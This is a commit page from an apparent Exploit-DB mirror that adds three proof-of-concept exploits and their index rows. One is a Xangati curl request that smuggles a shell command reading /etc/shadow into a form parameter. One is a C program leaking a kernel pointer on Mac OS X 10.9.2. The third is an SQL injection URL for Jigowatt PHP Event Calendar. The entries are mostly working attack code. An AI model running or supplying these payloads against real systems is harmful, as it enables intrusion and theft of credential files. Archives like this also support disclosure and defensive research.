bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-01-02

Browse source 
3 new exploits
This commit is contained in:
Offensive Security 2016-01-02 05:02:02 +00:00
parent f89cce16df
commit cf0225763f
4 changed files with 58 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
files.csv
View file

@ -35392,3 +35392,6 @@ id,file,description,date,author,platform,type,port
39141,platforms/php/webapps/39141.txt,"eazyCMS 'index.php' SQL Injection Vulnerability",2014-04-09,Renzi,php,webapps,0
39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0
39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0
39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0

Can't render this file because it is too large.

12
platforms/cgi/webapps/39145.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/66819/info
Xangati XSR And XNR are prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
'hxxps://www.example.com/servlet/Installer'

34
platforms/osx/local/39147.c Executable file
View file

@ -0,0 +1,34 @@
source: http://www.securityfocus.com/bid/67023/info
Apple Mac OS X is prone to a local security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
Apple Mac OS X 10.9.2 is vulnerable; other versions may also be affected.
#include <stdio.h>
#include <strings.h>
#include <sys/shm.h>
int main(int argc, char *argv[])
{
int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W );
if (shm < 0)
{
printf("shmget: failed");
return 6;
}
struct shmid_ds lolz;
int res = shmctl( shm, IPC_STAT, &lolz );
if (res < 0)
{
printf("shmctl: failed");
return 1;
}
printf( "%p\n", lolz.shm_internal );
}

9
platforms/php/webapps/39146.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/66923/info
Jigowatt PHP Event Calendar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Jigowatt PHP Event Calendar 2.16b is vulnerable; other versions may also be affected.
http://www.example.com/code/calendar/day_view.php?day=23&month=4&year=[SQL injection]